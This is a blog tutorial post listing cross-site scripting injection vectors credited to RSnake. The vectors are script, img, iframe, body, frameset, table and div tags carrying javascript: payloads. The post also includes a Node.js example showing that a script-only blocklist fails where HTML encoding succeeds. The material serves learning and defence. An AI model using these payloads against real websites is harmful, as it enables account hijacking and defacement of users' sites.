XSS:ANATOMY PART 2

Posted By HinD On 11:27 AM
Hello friends, this time I am going to cover the different kinds of tags that can be used for XSS injection. I will be taking a practical example of a site: the vulnerability in that site has been reported, but the site has still not been fixed.

First I will try to collect all the tags which can be used for XSS. I would also like to mention that this is not my own finding; it was originally published by RSNAKE. I am trying to collect all the information regarding XSS in one place, and without the basic tags it won't be possible to get a general idea of how XSS works.

Tags:
1.Script tag
We all know that for the basic finding of an XSS bug we type {script}alert(1){/script}. It is used to check whether any JavaScript is passing through or not.

2.Image tag
It is used to check whether the filter can be bypassed using the image tag, e.g. {img src="javascript:alert(1);" /}
Those who know the basics of HTML can understand this, so I won't explain how it works. Here the JavaScript tries to bypass the filter by using the img tag.

3.iframe
Here iframe injection is used to incorporate the evil website into the victim's website,
e.g.
{iframe src="http://www.google.com"}{/iframe}

4.Title Tag
Title tag can also be used to include the malicious XSS code
{/TITLE}{SCRIPT}alert("XSS");{/SCRIPT}

5.Input tag.
{INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"}

6.Body Tag
{BODY BACKGROUND="javascript:alert('XSS')"}
One notable feature of the body tag is that it does not require the use of "javascript:" for the execution of XSS, for example:
{BODY ONLOAD=alert('XSS')}

7.Style Sheet
A remote style sheet can also be used for the execution or inclusion of malicious XSS code
{LINK REL="stylesheet" HREF="http://www.google.com"}

8.Frames
Frames can also be used, as they have the same kind of problem as iframe
{FRAMESET}{FRAME SRC="javascript:alert('XSS');"}{/FRAMESET}

9.Tables
You may be surprised to know that even tables can be used for XSS; this discovery was made by RSNAKE (as far as I know)
{TABLE BACKGROUND="javascript:alert('XSS')"}

10.Div
Now comes everyone's favourite, DIV style, e.g.
{DIV STYLE="background-image: url(javascript:alert('XSS'))"}

In the above examples replace { } with < > respectively. On this Blogspot page all the tags were treated as HTML code and the page's behaviour changed accordingly, which is why I wasn't able to give the exact syntax.
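The list above is why a filter that only strips the script tag does not work as a defence. As an added example (not code from the original post or from RSNAKE's list), this Node.js snippet runs the post's own strings, with { } replaced by < >, through a hypothetical script-only blocklist and through HTML output encoding; blocklistFilter, encodeHtml, stillHasMarkup and survivors are names made up for this illustration.

```javascript
// Added example: constructed harness, not code from the original post.
// The strings listed in the post, with { } already replaced by < >.
const vectors = [
  '<script>alert(1)</script>',
  '<img src="javascript:alert(1);" />',
  '<iframe src="http://www.google.com"></iframe>',
  '</TITLE><SCRIPT>alert("XSS");</SCRIPT>',
  '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">',
  '<BODY BACKGROUND="javascript:alert(\'XSS\')">',
  '<BODY ONLOAD=alert(\'XSS\')>',
  '<LINK REL="stylesheet" HREF="http://www.google.com">',
  '<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>',
  '<TABLE BACKGROUND="javascript:alert(\'XSS\')">',
  '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">',
];

// Weak: a blocklist that only strips <script> tags (hypothetical filter).
function blocklistFilter(input) {
  return input.replace(/<\/?script[^>]*>/gi, '');
}

// Corrected: encode every HTML metacharacter before writing untrusted text
// into element content or a quoted attribute value.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function encodeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// True if the string still contains something a browser would parse as a tag.
function stillHasMarkup(s) {
  return /<\/?[a-z][^>]*>/i.test(s);
}

// Vectors whose markup is still present after the given filter has run.
function survivors(filter) {
  return vectors.filter((v) => stillHasMarkup(filter(v)));
}

console.log('blocklist leaves markup in', survivors(blocklistFilter).length, 'of', vectors.length);
console.log('encoding leaves markup in', survivors(encodeHtml).length, 'of', vectors.length);
```

HTML encoding covers element content and quoted attribute values only; untrusted values placed into src/href or style attributes also need URL-scheme and CSS validation.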

In the above figure I have tried to give you a practical demonstration of iframe injection, as it is not possible here to give a practical example of each and every tag discussed. I have not discussed the working or the demerits of the tags which lead to the execution of arbitrary XSS code; probably I will do that in future.
Anyway, this website is up to this day, and the original finder of the XSS bug has also reported it. If you want to practice more you can visit xssed.com, which is a database of XSS vulnerabilities.

I will discuss more tags in future, as RSNAKE has given a large number of tags; all credit goes to him.
Note:
1.Author is not responsible for the illegal use of the material provided here; it is only meant for educational purposes.


digital signature certificate
April 20, 2011 at 3:36 AM

XSS injection is a very sensitive and interesting topic. I never thought that some of these tags that you listed above can be used for XSS injection. Most strange is the way the Div tag can be used. It's rarely possible to test these things.
